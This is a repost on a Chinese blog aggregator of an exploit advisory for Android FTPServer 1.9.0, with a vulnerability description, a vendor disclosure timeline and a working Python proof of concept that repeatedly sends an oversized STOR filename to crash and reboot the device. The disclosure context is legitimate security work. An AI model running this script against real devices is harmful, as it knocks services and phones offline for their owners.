码迷,mamicode.com
首页 > 移动开发 > 详细

[Security_Android] Android FTPServer 1.9.0 - Remote DoS 代码分析

时间:2014-11-14 19:39:09      阅读:250      评论:0      收藏:0      [点我收藏+]

标签:android   http   io   ar   os   sp   for   on   art   

# Exploit Title: Android FTPServer 1.9.0 Remote DoS
# Date: 03/20/12
# Author: G13
# Twitter: @g13net
# Software Site: https://sites.google.com/site/andreasliebigapps/ftpserver/
# Download Link: http://www.g13net.com/ftpserver.apk
# Version: 1.9.0
# Category: DoS (android)
#
 
##### Vulnerability #####
 
FTPServer is vulnerable to a DoS condition when long file names are
repeatedly attempted to be written via the STOR command.
 
Successful exploitation will causes devices to restart.
 
Android Security Team has confirmed this issue.
 
I have been able to test this exploit against Android 2.2 and 2.3.
4.0 (ICS) appears not to be vulnerable.
 
##### Vendor Timeline #####
 
Android Security Team:
10/20/11 - Vendor Notified of vulnerability, Vendor notifies me they will
be looking into the issue
10/21/11 - vendor Requests bug report from device, bug report sent, PoC
Code Delivered to Vendor
10/24/11 - Asked Vendor Status, stated I have been able to duplicate issue
on multiple devices
10/25/11 - Vendor states they are still working on it
10/30/11 - Current Status asked
10/31/11 - vendor Replies no updates
11/7/11 - Emailed Vendor, they ask for more clarification on issue. I
submit more details
11/8/11 - Vendor acknowledges that it is not the APK itself causing the
crashes.  Vendor also confirms full reboots from PoC code.
11/9/11 - Vendor asks if I am just crashing application or device in
certain instances.  I state device is restarting.
11/11/11 - I ask if there is anything more I may assist with.  Vendor
states they have isolated the impacted component and are working on a
fix.
11/18/11 - Current status Asked.
12/8/11 - Update requested, response that they will contact Kernel team for
an update
01/13/12 - Current status asked, no response
03/06/12 - Current status asked, no response
03/20/12 - Disclosure
 
Developer:
1/24/12 - Developer contacted
1/25/12 - Developer Responds
1/27/12 - Supplied Developer with PoC code, Developer confirms issue
1/29/12 - Developer releases new version
3/20/12 - Disclosure
 
##### PoC #####
 
#!/usr/bin/python
# Android FTPServer PoC Device Crash
 
import socket
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
buffer = "STOR " + "A" * 5000 + "\r\n"
for x in xrange(1,31):
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 print x
 s.connect((‘172.16.30.108‘,2121))
 
 data=s.recv(1024)
 s.send("USER test\r\n")
 data=s.recv(1024)
 s.send("PASS test\r\n")
 
 s.send(buffer)
 
 s.send("QUIT")
 
 s.close()

[Security_Android] Android FTPServer 1.9.0 - Remote DoS 代码分析

标签:android   http   io   ar   os   sp   for   on   art   

原文地址:http://www.cnblogs.com/webapplee/p/4097952.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!